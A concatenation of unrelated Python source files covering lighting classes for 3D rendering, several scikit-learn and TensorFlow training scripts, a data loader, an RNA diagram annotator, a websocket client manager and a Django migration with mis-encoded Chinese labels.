roughness=roughness
)
class PointLights(TensorProperties):
def __init__(
self,
ambient_color=((0.5, 0.5, 0.5),),
diffuse_color=((0.3, 0.3, 0.3),),
specular_color=((0.2, 0.2, 0.2),),
location=((0, 1, 0),),
device: str = "cpu",
):
"""
Args:
ambient_color: RGB color of the ambient component
diffuse_color: RGB color of the diffuse component
specular_color: RGB color of the specular component
location: xyz position of the light.
device: torch.device on which the tensors should be located
The inputs can each be
- 3 element tuple/list or list of lists
- torch tensor of shape (1, 3)
- torch tensor of shape (N, 3)
The inputs are broadcast against each other so they all have batch
dimension N.
"""
super().__init__(
device=device,
ambient_color=ambient_color,
diffuse_color=diffuse_color,
specular_color=specular_color,
location=location,
)
_validate_light_properties(self)
if self.location.shape[-1] != 3:
msg = "Expected location to have shape (N, 3); got %r"
raise ValueError(msg % repr(self.location.shape))
def clone(self):
other = PointLights(device=self.device)
return super().clone(other)
def diffuse(self, normals, points) -> torch.Tensor:
direction = self.location - points
return diffuse(normals=normals, color=self.diffuse_color, direction=direction)
def specular(self, normals, points, camera_position, shininess) -> torch.Tensor:
direction = self.location - points
return specular(
points=points,
normals=normals,
color=self.specular_color,
direction=direction,
camera_position=camera_position,
shininess=shininess,
)
def specular_cook_torrance(self, normals, points, camera_position, F0, roughness) -> torch.Tensor:
direction = self.location - points
return specular_cook_torrance(
points=points,
normals=normals,
direction=direction,
color=self.specular_color,
camera_position=camera_position,
F0=F0,
roughness=roughness,
)
def _validate_light_properties(obj):
props = ("ambient_color", "diffuse_color", "specular_color")
for n in props:
t = getattr(obj, n)
if t.shape[-1] != 3:
msg = "Expected %s to have shape (N, 3); got %r"
raise ValueError(msg % (n, t.shape))
|
## imports
from EnzymePh import *
import pandas as pd
import argparse
import string
import numpy as np
import pickle
import joblib
import string
from sklearn.ensemble import RandomForestRegressor,ExtraTreesRegressor
## argumnet parser
parser = argparse.ArgumentParser()
parser.add_argument('--input_csv', default='input.csv')
args = parser.parse_args()
## output file
output_file_path = 'predictions.csv'
## take input as sequence and convert it to descriptor dataframe
composition = PredictFrame(args.input_csv,descriptors_list= ["CC",])
Biopyth = PredictFrame(args.input_csv,descriptors_list= ["BioPythDescriptor",])
AminoAcid = PredictFrame(args.input_csv,descriptors_list = ["AAC"])
## data saved in variable
comp = composition.show()
Bio = Biopyth.show()
aa = AminoAcid.show()
## columns to be removed from the
columns =[*[alpha for alpha in string.ascii_uppercase if alpha not in ["B","J","O","U","X","Z"]],]
## dropping colunms Biopyth
df = Bio.drop(columns,axis=1)
##conacting the dataframe
dataf = pd.concat([df,comp,aa],axis=1,join="outer")
## loading model
with open("model.pkl","rb") as predictive_model:
model = joblib.load(predictive_model)
## transforming the data to array for prediction and writing output file
y_predictions = []
for i in range(len(df)):
s = model.predict(np.array(dataf.iloc[i]).reshape(1,-1))
y_predictions.append(s[0])
# Save predictions to file
df_predictions = pd.DataFrame({'prediction': y_predictions})
df_predictions.to_csv(output_file_path, index=False)
|
import pandas as pd
import numpy as np
import sklearn
from sklearn import linear_model
import matplotlib.pyplot as plt #from matplotlib import style #import seaborn as sns
data = pd.read_csv("data.csv")
print(len(data))
data = data[
["danceability", "energy", "acousticness", "duration_ms", "popularity", "tempo", "instrumentalness",
"liveness", "year", "loudness", "speechiness"]]
predict = "popularity"
x = np.array(data.drop([predict], 1))
y = np.array(data[predict])
x_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(x, y, test_size=0.3)
linear = linear_model.LinearRegression()
linear.fit(x_train, y_train)
acc = linear.score(x_test, y_test)
print(acc)
print(linear.coef_)
#Lplt.show(sns.jointplot(x="speechiness", y="popularity", data=data, kind='reg', joint_kws={'line_kws':{'color':'red'}}))
#print("Coefficient: \n", linear.coef_)
#print("Intercept \n", linear.intercept_)
predictions = linear.predict(x_test)
for x in range(len(predictions)):
print(predictions[x], x_test[x], y_test[x])
#print(linear.score(x, y))
|
"""
datafiles.py
============
This module provides functions to load data from csv and csv-like files into
memory for easy manipulation. It makes no assumptions about downstream
processing. (e.g. whether the data is intended to be used with scikit-learn).
"""
from collections import defaultdict
import cPickle as pickle
import re
import sys
import utilities
from utilities import safe_float, safe_int
# Constants
DATA_FOLDER = '../../../Desktop/data'
EPISODES_FILE = 'physiological-full-sparse.csv'
OUTCOMES_FILE = 'outcomes.csv'
EPISODES_PICKLE = EPISODES_FILE.replace('csv', 'pkl')
NUM_VARS = 13
# Internal functions
def _parse_episodes_file(f):
headers = f.readline().strip().split(',')
episodes = []
for line in f:
split = re.split(',|:', line)
id, data = int(split[0]), map(safe_float, split[1:])
episode = defaultdict(list)
for i in range(0, len(data), 3):
time, var, value = map(float, data[i:i + 3])
var = int(var) - 1 # convert for 0-indexing
episode[var].append((time, value))
episodes.append((id, episode))
return headers, episodes
# Public functions
@utilities.timed
@utilities.cached
@utilities.pickled('/'.join((DATA_FOLDER, EPISODES_PICKLE)))
def load_episodes():
""" Loads all episode data.
Each of the 7890 episodes contains 13 physiological variables that are
sampled very sparsely in time.
Returns a list of (episode_id, episode_data) tuples.
- episode_id is a an integer.
- episode_data is a list of thirteen lists. Each of the thirteen lists
contains measurements for a physiological variable. The measurements are
a (time, value) tuple. Time and value are floats.
"""
with open('/'.join((DATA_FOLDER, EPISODES_FILE))) as f:
headers, episodes = _parse_episodes_file(f)
print '{0} episodes loaded.'.format(len(episodes))
return headers, episodes
@utilities.timed
@utilities.cached
def load_outcomes():
""" Loads the outcomes associated with each episode.
The columns are:
- episode_id
- length of stay (in seconds?)
- mortality 0 for died, 1 for lived
- medical length of stay (some missing values)
"""
with open('/'.join((DATA_FOLDER, OUTCOMES_FILE))) as f:
headers = f.readline().strip().split(',')
outcomes = []
for line in f:
split = line.split(',')
id, data = safe_int(split[0]), map(safe_int, split[1:])
outcomes.append((id, data))
return headers, outcomes
if __name__ == '__main__':
load_outcomes()
|
#! /usr/bin/env python
import argparse, sys, os, errno
import logging
logging.basicConfig(level=logging.DEBUG, format='[%(asctime)s] [%(levelname)s] %(name)s: %(message)s')
def annotate_structure_diagram(args):
import re
pat_nucleotide = re.compile(r'^\([AUGCT]\) ([0-9\.\-]+) ([0-9\.\-]+) lwstring$')
prolog_lines = []
nucleotide_lines = []
epilog_lines = []
end_prolog = False
nucleotide_coords = []
# read input PostScript file
logger.info('read input file: ' + args.input_file)
with open(args.input_file, 'r') as fin:
for line in fin:
m = pat_nucleotide.match(line.strip())
if m is not None:
x, y = [float(a) for a in m.groups()]
nucleotide_coords.append((x + 3, y + 3))
end_prolog = True
nucleotide_lines.append(line)
else:
if end_prolog:
epilog_lines.append(line)
else:
prolog_lines.append(line)
colors = []
if args.colors is not None:
import numpy as np
logger.info('read colors from file: ' + args.colors)
with open(args.colors, 'r') as f:
for line in f:
colors.append([float(a) for a in line.strip().split()])
colors = np.asarray(colors)
elif args.values is not None:
import numpy as np
import matplotlib
matplotlib.use('Agg')
from matplotlib.pyplot import get_cmap
logger.info('use matplotlib colormap: ' + args.colormap)
colormap = get_cmap(args.colormap)
values = []
logger.info('read values from file: ' + args.values)
with open(args.values, 'r') as f:
for line in f:
values.append(float(line.strip()))
values = np.asarray(values)
# normalize values
values = (values - np.min(values))/(np.max(values) - np.min(values))
values = (values - 0.5)*args.scale + 0.5
colors = colormap(values)[:, :3]
if len(colors) != len(nucleotide_coords):
raise ValueError('number of values ({0}) and number nucleotides ({1}) does not match'.format(len(colors), len(nucleotide_coords)))
logger.info('create output file: ' + args.output_file)
with open(args.output_file, 'w') as fout:
fout.writelines(prolog_lines)
fout.write('/lwfcarc {newpath gsave setrgbcolor translate scale /rad exch def /ang1 exch def /ang2 exch def\n')
fout.write('0.0 0.0 rad ang1 ang2 arc fill grestore} def\n')
for nucleotide_coord, color in zip(nucleotide_coords, colors):
x, y = nucleotide_coord
r, g, b = color
fout.write('360.00 0.00 4.20 1.00 1.00 {:.2f} {:.2f} {:.3f} {:.3f} {:.3f} lwfcarc\n'.format(x, y, r, g, b))
fout.writelines(nucleotide_lines)
fout.writelines(epilog_lines)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Process SHAPE-MaP data')
parser.add_argument('--input-file', '-i', type=str, required=True,
help='input structure diagram in PostScript format '
'(downloaded from http://www.rna.icmb.utexas.edu/DAT/3C/Structure/index.php)')
g = parser.add_mutually_exclusive_group(required=True)
g.add_argument('--colors', type=str,
help='a text file containing RGB values for each nucleotide per line')
g.add_argument('--values', type=str,
help='a text file containing continous values for each nucleotide per line')
parser.add_argument('--colormap', type=str, default='Greys_r',
help='matplotlib colormap name')
parser.add_argument('--scale', type=float, default=1.0)
parser.add_argument('--output-file', '-o', type=str, required=True,
help='output file in PostScript format')
args = parser.parse_args()
logger = logging.getLogger('annotate_structure_diagram')
annotate_structure_diagram(args)
|
"""WS channels."""
import asyncio
import hashlib
import json
import logging
import sys
from time import monotonic
from typing import Callable, Dict, List
import aiohttp
if sys.version_info >= (3, 7):
from contextlib import asynccontextmanager
else:
# For python3.6
from ambra_sdk.async_context_manager import asynccontextmanager
logger = logging.getLogger(__name__)
# Server inactivity timeout = 300
# https://github.com/dicomgrid/v3services/blob/master/app/websocket.pl#L40
INACTIVITY_TIMEOUT = 10
class AsyncWSManager: # NOQA: WPS214
"""WS.
WS.run create socket connection and ping it
every INACTIVITY seconds. This is maintain connection.
But sometimes server close connection.
In this case WS recreate connection and
resubscribe channels
Communication with WS through
responses and requests queues.
"""
def __init__(
self,
url: str,
):
"""Init.
:param url: websocket url
"""
self._url = url
self._channels: Dict[str, str] = {}
self._session = None
self._ws = None
self._last_ping = None
self._ping_interval = INACTIVITY_TIMEOUT
self._subscribe_wait_timeout = 10
self._unsubscribe_wait_timeout = self._subscribe_wait_timeout
@asynccontextmanager # NOQA:WPS217,WPS213
async def channels(
self,
sid: str,
channel_names: List[str],
):
"""Channels ws context manager.
:param sid: sid
:param channel_names: list of channels
:yields: self manager with channels subscribtions
"""
for channel in channel_names:
await self.subscribe(sid, channel)
await self.wait_for_subscribe(
channel,
timeout=self._subscribe_wait_timeout,
)
try: # NOQA: WPS501
yield self
finally:
logger.debug('Stop')
for channel_name in channel_names:
await self.unsubscribe(channel_name)
await self.wait_for_unsubscribe(
channel_name,
timeout=self._unsubscribe_wait_timeout,
)
# refresh socket and closed it
await self._get_ws()
assert self._ws is not None # NOQA:S101
await self._ws.close()
await self._session.close()
@asynccontextmanager
async def channel(
self,
sid: str,
channel_name: str,
):
"""Channel ws context manager.
:param sid: sid
:param channel_name: name of channel
:yields: self manager with channel subscribtion
"""
async with self.channels(sid, channel_names=[channel_name]) as ws:
yield ws
async def subscribe(self, sid, channel):
"""Subscribe.
:param sid: sid
:param channel: channel
"""
logger.debug('Subscribe %s', channel)
self._channels[channel] = sid
sub_request = json.dumps(
{
'action': 'subscribe',
'channel': channel,
'sid': sid,
},
)
ws = await self._get_ws()
await ws.send_str(sub_request)
async def resubscribe(self):
"""Resubscribe."""
logger.debug('Resubscribe')
for channel, sid in self._channels.items():
await self._subscribe(sid, channel)
async def unsubscribe(self, channel):
"""Unsubscribe.
:param channel: channel
"""
logger.debug('Unsubscribe %s', channel)
self._channels.pop(channel)
close_request = json.dumps(
{
'action': 'unsubscribe',
'channel': channel,
# But required! ;-)
'sid': 'NOT NEEDED!',
},
)
ws = await self._get_ws()
await ws.send_str(close_request)
async def wait_for( # NOQA:WPS231
self,
fn: Callable[[aiohttp.WSMessage], bool],
timeout: int = None,
) -> aiohttp.WSMessage:
"""Wait while fn(msg) is True.
On TimeoutError this func dont stop ws.
So you need to run this func in try-except block.
:param fn: Function for find message
:param timeout: timeout
:raises TimeoutError: timeout error
:raises RuntimeError: Unknown message in ws
:returns: message
"""
start = monotonic()
while True:
await self._ping()
if timeout and (monotonic() - start) >= timeout:
raise TimeoutError
ws = await self._get_ws()
try:
msg: aiohttp.WSMessage = await asyncio.wait_for(
ws.receive(),
timeout=min(self._ping_interval, timeout),
)
except asyncio.TimeoutError:
continue
logger.debug('Recieved: %s', str(msg))
if msg.type == aiohttp.WSMsgType.TEXT:
if fn(msg):
return msg
elif msg.type == aiohttp.WSMsgType.CLOSING:
continue
elif msg.type == aiohttp.WSMsgType.CLOSED:
logger.debug('Connection closed')
# refresh socket
ws = await self._get_ws()
continue
else:
raise RuntimeError(
'Unimplemented {msg_type}'.format(
msg_type=str(msg.type),
),
)
async def wait_for_event(
self,
channel: str,
sid: str,
event: str,
timeout: int = None,
) -> aiohttp.WSMessage:
"""Wait for event.
:param channel: channel name
:param sid: sid
:param event: event status name
:param timeout: timeout
:return: msg
"""
sid_md5 = hashlib.md5(sid.encode()).hexdigest() # NOQA:S303
def _is_ready(msg): # NOQA:WPS430
if msg.type != aiohttp.WSMsgType.TEXT:
return False
msg_json = msg.json()
msg_event = msg_json.get('event')
msg_channel = msg_json.get('channel')
msg_sid_md5 = msg_json.get('sid_md5')
if msg_event is None \
or msg_channel is None \
or msg_sid_md5 is None:
return False
if channel == msg_channel \
and msg_sid_md5 == sid_md5 \
and msg_event == event:
return True
return False
return await self.wait_for(_is_ready, timeout)
async def wait_for_subscribe(
self,
channel: str,
timeout: int = None,
) -> aiohttp.WSMessage:
"""Wait for subscribe.
:param channel: channel name
:param timeout: timeout
:return: msg
"""
def _is_subscribed(msg): # NOQA:WPS430
if msg.type != aiohttp.WSMsgType.TEXT:
return False
msg_json = msg.json()
status = msg_json.get('status')
msg_channel = msg_json.get('channel')
if status is not None \
and msg_channel is not None \
and channel == msg_channel \
and status == 'OK':
return True
return False
return await self.wait_for(_is_subscribed, timeout)
async def wait_for_unsubscribe(
self,
channel: str,
timeout: int = None,
) -> aiohttp.WSMessage:
"""Wait for unsubscribe.
:param channel: channel name
:param timeout: timeout
:return: msg
"""
# actually this is same as wait for subscribe
# Server return equal responses.
return await self.wait_for_subscribe(channel, timeout)
async def _get_ws(self):
"""Websocket connection.
Get locks and refresh connection if it closed.
:return: websocket connection
"""
if self._session is None or self._session.closed:
logger.debug('Create new session')
self._session = aiohttp.ClientSession()
if self._ws is None:
logger.debug('Run ws connection')
self._ws = await self._session.ws_connect(self._url)
elif self._ws.closed:
logger.debug('Restart ws connection')
self._ws = await self._session.ws_connect(self._url)
await self._resubscribe()
return self._ws
async def _ping(self):
now = monotonic()
if self._last_ping is None:
self._last_ping = now
if now - self._last_ping >= self._ping_interval:
logger.debug('Ping')
ping_request = json.dumps({'action': 'ping'})
ws = await self._get_ws()
await ws.send_str(ping_request)
self._last_ping = now
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 6 23:09:27 2018
@author: gjxhlan
"""
# Data Preprocessing
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Salary_Data.csv')
year = dataset.iloc[:,:-1].values
salary = dataset.iloc[:,1].values
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
year_train, year_test, salary_train, salary_test = train_test_split(year, salary, test_size = 1/3, random_state = 0)
# Train the model
# Fitting Simple Linear Regression to the training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(year_train, salary_train)
# Predicting the test set results
salary_pred = regressor.predict(year_test)
# Visualising the training set results
plt.scatter(year_train, salary_train, c = 'red')
plt.plot(year_train, regressor.predict(year_train), color = 'blue')
plt.title('Salary vs Experience (Training set)')
plt.xlabel('Years of Experience')
plt.ylabel('Salary')
plt.show()
# Visualising the predicting set results
plt.scatter(year_test, salary_test, c = 'red')
plt.plot(year_train, regressor.predict(year_train), color = 'blue')
plt.title('Salary vs Experience (Test set)')
plt.xlabel('Years of Experience')
plt.ylabel('Salary')
plt.show() |
import tensorflow as tf
import numpy as np
import os, time
from crnn_SVNH import CRNN
from dataset import Dataset
from common import config
def train(prev_model_path=None):
# prepare dataset
dataset_train = Dataset('train')
dataset_test = Dataset('test')
# define computing graph
model = CRNN()
net_out, raw_pred = model.build_infer_graph()
loss = model.compute_loss(net_out)
# set optimizer
global_step = tf.Variable(0, name='global_step', trainable=False)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
#optimizer = tf.train.AdamOptimizer()
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.0005)
train_op = optimizer.minimize(
loss=loss, global_step=global_step)
# decoder
decoded, _ = tf.nn.ctc_beam_search_decoder(net_out,
sequence_length=tf.to_int32(tf.fill(tf.shape(model._inputdata)[:1], config.seq_length)),
beam_width=5,
merge_repeated=False, top_paths=1)
decoded = decoded[0]
decoded_paths = tf.sparse_tensor_to_dense(decoded, default_value=config.class_num-1)
# evaluate on test set
def evaluate(sess, dataset):
loss_lst = []
label_pred = []
label_true = []
for inputdata, sparse_label, raw_label in dataset.one_epoch_generator():
decoded_paths_val, loss_val = sess.run([decoded_paths, loss], feed_dict={
model.place_holders['inputdata']: inputdata,
model.place_holders['label']: sparse_label,
model.place_holders['is_training']: False
})
for x in decoded_paths_val:
label_pred.append([idx for idx in x if idx != config.class_num-1])
for x in raw_label:
label_true.append(x)
loss_lst.append(loss_val)
acc = cal_acc(label_pred, label_true)
return np.mean(loss_lst), acc
# Set tf summary
tboard_save_dir = config.tboard_save_dir
os.makedirs(tboard_save_dir, exist_ok=True)
tf.summary.scalar(name='train_loss', tensor=loss)
merged = tf.summary.merge_all()
# Set saver configuration
saver = tf.train.Saver()
model_save_dir = config.model_save_dir
os.makedirs(model_save_dir, exist_ok=True)
# Set sess configuration
sess = tf.Session()
summary_writer = tf.summary.FileWriter(tboard_save_dir)
summary_writer.add_graph(sess.graph)
# training
global_cnt = 0
with sess.as_default():
if prev_model_path is None:
sess.run(tf.global_variables_initializer())
print('Initialiation finished!')
epoch = 0
else:
print('Restore model from {:s}'.format(prev_model_path))
saver.restore(sess=sess, save_path=prev_model_path)
epoch = 0
while epoch < config.epochs:
epoch += 1
for batch_idx, (inputdata, sparse_label, raw_label) in enumerate(dataset_train.one_epoch_generator()):
global_cnt += 1
loss_val, _, summary = sess.run([loss, train_op, merged], feed_dict={
model.place_holders['inputdata']: inputdata,
model.place_holders['label']: sparse_label,
model.place_holders['is_training']: True
})
summary_writer.add_summary(summary, global_cnt)
if (batch_idx+1)%config.evaluate_batch_interval == 0:
test_loss_val, test_acc = evaluate(sess, dataset_test)
print("----Epoch-{:n}, progress:{:.2%}, evaluation results:".format(epoch,
(batch_idx+1)*config.train_batch_size/config.train_size))
print("--Train_loss: {:.4f}".format(loss_val))
print("--Test_loss: {:.4f}".format(test_loss_val))
print("--Test_accuarcy: {:.4f}\n".format(test_acc))
summary_writer.add_summary(
tf.Summary(value=[tf.Summary.Value(tag='test_loss', simple_value=test_loss_val)]),
global_cnt)
summary_writer.add_summary(
tf.Summary(value=[tf.Summary.Value(tag='test_acc', simple_value=test_acc)]),
global_cnt)
if epoch % config.save_epoch_interval == 0:
test_loss_val, test_acc = evaluate(sess, dataset_test)
train_loss_val, train_acc = evaluate(sess, dataset_train)
print("----Epoch-{:n} finished, evaluation results:".format(epoch))
print("--Train_loss: {:.4f}".format(train_loss_val))
print("--Train_accuarcy: {:.4f}".format(train_acc))
print("--Test_loss: {:.4f}".format(test_loss_val))
print("--Test_accuarcy: {:.4f}\n".format(test_acc))
model_name = 'CRNN-e{:n}-acc{:.1f}.ckpt'.format(epoch, 100*test_acc)
model_save_path = os.path.join(model_save_dir, model_name)
print('Saving model...')
saver.save(sess=sess, save_path=model_save_path, global_step=epoch)
print('Saved!')
def cal_acc(label_pred, label_true):
assert len(label_pred) == len(label_true)
cnt = 0
for i in range(len(label_pred)):
if label_pred[i] == label_true[i]:
cnt += 1
return cnt/len(label_pred)
if __name__ == '__main__':
train('.\\tf_ckpt\\CRNN-e7-acc59.7.ckpt-7')
#train()
|
import numpy as np
import matplotlib.pyplot as plt
import math
f = open("track_points_3.txt", "r")
x = []
y = []
x_rail_1 = []
y_rail_1 = []
x_rail_2 = []
y_rail_2 = []
x_subset = []
y_subset = []
count = 0
buf = 0.8
for i in f:
a = i.split()
#print(a);
x.append(-1*float(a[0])) #to show figure as gazebo
y.append(float(a[1]))
"""if count==0:
x_rail_1.append(x[0])
y_rail_1.append(y[0]-buf)
x_rail_2.append(x[0])
y_rail_2.append(y[0]+buf)
x_subset.append(x[0])
y_subset.append(y[0])
else:
x_diff = x[count]-x[count-1]
y_diff = y[count]-y[count-1]
mag = math.sqrt(x_diff**2 + y_diff**2)
x_diff_norm = x_diff/mag
y_diff_norm = y_diff/mag
#print(x_diff_norm, " ", y_diff_norm)
x_rail_1.append(x[count]+buf*(-1*y_diff_norm))
y_rail_1.append(y[count]+buf*(x_diff_norm))
#mag_rail_1 = math.sqrt((x_rail_1[count]-x[count])**2 + (y_rail_1[count]-y[count])**2)
x_rail_2.append(x[count]+buf*(y_diff_norm))
y_rail_2.append(y[count]+buf*(-1*x_diff_norm))
#mag_rail_2 = math.sqrt((x_rail_2[count]-x[count])**2 + (y_rail_2[count]-y[count])**2)
#print(mag_rail_1, " ", mag_rail_2)
x_subset.append(x[count])
y_subset.append(y[count])
count+=1"""
#plt.scatter(y_rail_1,x_rail_1)
#plt.scatter(y_rail_2,x_rail_2)
plt.scatter(y,x) #to show figure as gazebo
#plt.scatter(y_subset,x_subset) #to show figure as gazebo
plt.show()
|
# Generated by Django 3.1.4 on 2021-01-08 00:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Campus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=4, verbose_name='็ฎ็งฐ')),
('full_name', models.CharField(max_length=16, verbose_name='ๅ
จ็งฐ')),
('longitude', models.FloatField(verbose_name='็ปๅบฆ')),
('latitude', models.FloatField(verbose_name='็บฌๅบฆ')),
('zoom', models.PositiveSmallIntegerField(verbose_name='็ผฉๆพ็บงๅซ')),
],
options={
'verbose_name': 'ๆ กๅบ',
'verbose_name_plural': 'ๆ กๅบ',
},
),
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=16, verbose_name='ๅ็งฐ')),
('longitude', models.FloatField(verbose_name='็ปๅบฆ')),
('latitude', models.FloatField(verbose_name='็บฌๅบฆ')),
('campus', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='locations', related_query_name='location', to='campus.campus', verbose_name='ๆ กๅบ')),
],
options={
'verbose_name': 'ไฝ็ฝฎ',
'verbose_name_plural': 'ไฝ็ฝฎ',
},
),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.